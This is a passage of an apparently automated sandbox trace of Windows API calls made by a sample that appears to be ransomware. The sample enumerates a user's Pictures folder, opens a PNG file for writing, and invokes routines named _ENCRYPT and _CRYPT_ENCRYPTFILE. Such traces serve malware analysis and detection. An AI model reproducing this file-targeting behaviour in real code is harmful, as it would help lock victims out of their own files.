Flags=0x0, Size=0x8) returned 0x8e18c0 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0188.589] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.589] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.589] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.589] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.589] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.590] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.590] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.590] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.590] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4c8 [0188.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.591] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gghhl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.591] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.591] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.591] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.592] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0188.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.592] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.592] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.593] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0188.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.593] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.593] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.599] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.599] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.599] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0188.600] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.600] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ggHHL.png", cAlternateFileName="")) returned 0x90add8 [0188.600] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.601] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ggHHL.png", cAlternateFileName="")) returned 0x90add8 [0188.601] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.601] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ggHHL.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.603] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.603] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.603] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.603] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.603] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.603] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.604] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.604] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.604] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb40feb0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xbb86cd70, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xbb86cd70, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x14cae, dwReserved0=0x87ef08, 